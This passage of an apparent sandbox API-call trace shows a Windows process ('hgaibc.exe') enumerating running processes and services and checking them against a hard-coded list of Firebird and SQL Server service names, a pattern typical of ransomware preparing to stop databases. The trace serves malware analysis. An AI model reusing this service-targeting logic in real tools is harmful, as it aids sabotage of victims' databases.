lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.439] lstrlenW (lpString="svchost.exe") returned 11 [0178.439] Process32NextW (in: hSnapshot=0x2ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.440] lstrlenW (lpString="svchost.exe") returned 11 [0178.440] Process32NextW (in: hSnapshot=0x2ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.441] lstrlenW (lpString="svchost.exe") returned 11 [0178.441] Process32NextW (in: hSnapshot=0x2ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0178.442] lstrlenW (lpString="spoolsv.exe") returned 11 [0178.442] Process32NextW (in: hSnapshot=0x2ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.443] lstrlenW (lpString="svchost.exe") returned 11 [0178.443] Process32NextW (in: hSnapshot=0x2ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x4b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0178.444] lstrlenW (lpString="audiodg.exe") returned 11 [0178.444] Process32NextW (in: hSnapshot=0x2ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0178.445] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0178.445] Process32NextW (in: hSnapshot=0x2ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0178.446] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0178.446] Process32NextW (in: hSnapshot=0x2ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0178.447] lstrlenW (lpString="Memory Compression") returned 18 [0178.447] Process32NextW (in: hSnapshot=0x2ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0178.448] lstrlenW (lpString="sihost.exe") returned 10 [0178.448] Process32NextW (in: hSnapshot=0x2ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.448] lstrlenW (lpString="svchost.exe") returned 11 [0178.448] Process32NextW (in: hSnapshot=0x2ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3bc, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0178.449] lstrlenW (lpString="msoia.exe") returned 9 [0178.449] Process32NextW (in: hSnapshot=0x2ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0178.450] lstrlenW (lpString="taskhostw.exe") returned 13 [0178.450] Process32NextW (in: hSnapshot=0x2ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3f, th32ParentProcessID=0x9c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0178.451] lstrlenW (lpString="explorer.exe") returned 12 [0178.451] Process32NextW (in: hSnapshot=0x2ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0178.452] lstrlenW (lpString="SearchUI.exe") returned 12 [0178.452] Process32NextW (in: hSnapshot=0x2ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0178.453] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0178.453] Process32NextW (in: hSnapshot=0x2ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0178.454] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0178.454] Process32NextW (in: hSnapshot=0x2ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0178.455] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0178.697] Process32NextW (in: hSnapshot=0x2ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x9d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0178.698] lstrlenW (lpString="hgaibc.exe") returned 10 [0178.698] Process32NextW (in: hSnapshot=0x2ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0178.745] lstrlenW (lpString="conhost.exe") returned 11 [0178.745] Process32NextW (in: hSnapshot=0x2ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0178.745] lstrlenW (lpString="dllhost.exe") returned 11 [0178.745] Process32NextW (in: hSnapshot=0x2ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0178.746] lstrlenW (lpString="dllhost.exe") returned 11 [0178.746] Process32NextW (in: hSnapshot=0x2ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0178.747] lstrlenW (lpString="hgaibc.exe") returned 10 [0178.747] Process32NextW (in: hSnapshot=0x2ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x2a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0178.748] lstrlenW (lpString="cmd.exe") returned 7 [0178.748] Process32NextW (in: hSnapshot=0x2ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xc40, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0178.749] lstrlenW (lpString="conhost.exe") returned 11 [0178.749] Process32NextW (in: hSnapshot=0x2ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xc40, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0178.750] CloseHandle (hObject=0x2ac) returned 1 [0178.750] Sleep (dwMilliseconds=0x1f4) [0179.518] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x458c448 [0179.518] EnumServicesStatusExW (in: hSCManager=0x458c448, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0) returned 0 [0179.519] GetLastError () returned 0xea [0179.519] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c30) returned 0x6fd308 [0179.519] EnumServicesStatusExW (in: hSCManager=0x458c448, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x6fd308, cbBufSize=0x1c30, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x6fd308, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0) returned 1 [0179.520] CloseServiceHandle (hSCObject=0x458c448) returned 1 [0179.520] lstrlenW (lpString="Appinfo") returned 7 [0179.520] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0179.520] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0179.520] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0179.520] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0179.520] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0179.520] lstrlenW (lpString="AppXSvc") returned 7 [0179.521] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0179.521] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0179.521] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0179.521] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0179.521] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0179.521] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0179.521] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0179.521] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0179.521] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0179.521] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0179.521] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0179.521] lstrlenW (lpString="Audiosrv") returned 8 [0179.521] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0179.521] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0179.521] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0179.521] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0179.521] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0179.521] lstrlenW (lpString="BFE") returned 3 [0179.521] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0179.521] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0179.521] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0179.521] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0179.521] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0179.521] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0179.521] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0179.521] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0179.521] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0179.521] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0179.521] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0179.521] lstrlenW (lpString="CDPSvc") returned 6 [0179.521] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0179.521] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0179.521] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0179.521] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0179.521] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0179.522] lstrlenW (lpString="ClickToRunSvc") returned 13 [0179.522] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0179.522] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0179.522] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0179.522] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0179.522] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0179.522] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0179.522] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0179.522] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0179.522] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0179.522] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0179.522] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0179.522] lstrlenW (lpString="CryptSvc") returned 8 [0179.522] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0179.522] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0179.522] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0179.522] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0179.522] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0179.522] lstrlenW (lpString="DcomLaunch") returned 10 [0179.522] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0179.522] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0179.522] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0179.522] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0179.522] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0179.522] lstrlenW (lpString="DeviceAssociationService") returned 24 [0179.522] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0179.522] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0179.522] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0179.522] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0179.522] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0179.522] lstrlenW (lpString="Dhcp") returned 4 [0179.522] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0179.522] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0179.522] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0179.522] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0179.522] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0179.523] lstrlenW (lpString="Dnscache") returned 8 [0179.523] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0179.523] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0179.523] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0179.523] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0179.523] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0179.523] lstrlenW (lpString="DPS") returned 3 [0179.523] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0179.523] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0179.523] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0179.523] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0179.523] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0179.523] lstrlenW (lpString="DusmSvc") returned 7 [0179.523] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0179.523] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0179.523] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0179.523] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0179.523] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0179.523] lstrlenW (lpString="EventLog") returned 8 [0179.523] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0179.523] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0179.523] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0179.523] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0179.523] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0179.523] lstrlenW (lpString="EventSystem") returned 11 [0179.523] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0179.523] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0179.523] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0179.523] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0179.523] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0179.523] lstrlenW (lpString="FontCache") returned 9 [0179.523] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0179.523] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0179.523] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0179.523] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0179.523] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0179.524] lstrlenW (lpString="gpsvc") returned 5 [0179.524] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0179.524] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0179.524] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0179.524] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0179.524] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0179.524] lstrlenW (lpString="iphlpsvc") returned 8 [0179.524] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0179.524] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0179.524] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0179.524] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0179.524] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0179.524] lstrlenW (lpString="KeyIso") returned 6 [0179.524] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0179.524] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0179.524] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0179.524] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0179.524] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0179.524] lstrlenW (lpString="LanmanServer") returned 12 [0179.524] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0179.524] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0179.524] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0179.524] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0179.524] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0179.524] lstrlenW (lpString="LanmanWorkstation") returned 17 [0179.524] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0179.524] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0179.524] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0179.524] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0179.524] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0179.524] lstrlenW (lpString="lfsvc") returned 5 [0179.524] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0179.524] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0179.524] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0179.524] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0179.524] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0179.524] lstrlenW (lpString="lmhosts") returned 7 [0179.524] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0179.525] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0179.525] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0179.525] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0179.525] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0179.525] lstrlenW (lpString="LSM") returned 3 [0179.525] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0179.525] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0179.525] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0179.525] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0179.525] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0179.525] lstrlenW (lpString="MpsSvc") returned 6 [0179.525] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0179.525] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0179.525] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0179.525] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0179.525] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0179.525] lstrlenW (lpString="NcbService") returned 10 [0179.525] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0179.525] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0179.525] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0179.525] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0179.525] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0179.525] lstrlenW (lpString="netprofm") returned 8 [0179.525] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0179.525] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0179.525] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0179.525] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0179.525] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0179.525] lstrlenW (lpString="NgcSvc") returned 6 [0179.525] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0179.525] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0179.525] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0179.525] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0179.525] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0179.525] lstrlenW (lpString="NlaSvc") returned 6 [0179.525] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0179.525] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0179.525] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0179.526] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0179.526] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0179.526] lstrlenW (lpString="nsi") returned 3 [0179.526] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0179.526] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0179.526] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0179.526] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0179.526] lstrcmpiW (lpString1="sqlserveradhelper", 